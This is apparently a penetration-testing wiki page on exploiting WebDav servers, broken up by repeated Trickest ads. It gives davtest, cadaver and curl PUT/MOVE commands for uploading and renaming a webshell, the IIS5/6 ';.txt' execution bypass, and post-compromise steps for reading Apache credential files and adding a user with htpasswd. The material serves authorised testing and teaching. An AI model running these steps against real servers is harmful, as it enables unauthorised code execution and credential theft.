WebDav

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

When dealing with a HTTP Server with WebDav enabled, it's possible to manipulate files if you have the right credentials, usually verified through HTTP Basic Authentication. Gaining control over such a server often involves the upload and execution of a webshell.

Access to the WebDav server typically requires valid credentials, with WebDav bruteforce being a common method to acquire them.

To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:

• Upload files with executable extensions directly if not restricted.

• Rename uploaded non-executable files (like .txt) to an executable extension.

• Copy uploaded non-executable files, changing their extension to one that is executable.

DavTest

Davtest try to upload several files with different extensions and check if the extension is executed:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Output sample:

This doesn't mean that .txt and .html extensions are being executed. This mean that you can access this files through the web.

Cadaver

You can use this tool to connect to the WebDav server and perform actions (like upload, move or delete) manually.

cadaver <IP>

PUT request

curl -T 'shell.txt' 'http://$ip'

MOVE request

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

IIS5/6 WebDav Vulnerability

This vulnerability is very interesting. The WebDav does not allow to upload or rename files with the extension .asp. But you can bypass this adding at the end of the name ";.txt" and the file will be executed as if it were a .asp file (you could also use ".html" instead of ".txt" but DON'T forget the ";").

Then you can upload your shell as a ".txt" file and copy/move it to a ".asp;.txt" file. An accessing that file through the web server, it will be executed (cadaver will said that the move action didn't work, but it did).

Post credentials

If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly: /etc/apache2/sites-enabled/000-default

Inside it you could find something like:

ServerAdmin webmaster@localhost
        Alias /webdav /var/www/webdav
        <Directory /var/www/webdav>
                DAV On
                AuthType Digest
                AuthName "webdav"
                AuthUserFile /etc/apache2/users.password
                Require valid-user

As you can see there is the files with the valid credentials for the webdav server:

/etc/apache2/users.password

Inside this type of files you will find the username and a hash of the password. These are the credentials the webdav server is using to authenticate users.

You can try to crack them, or to add more if for some reason you wan to access the webdav server:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

To check if the new credentials are working you can do:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

References

• https://vk9-sec.com/exploiting-webdav/

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest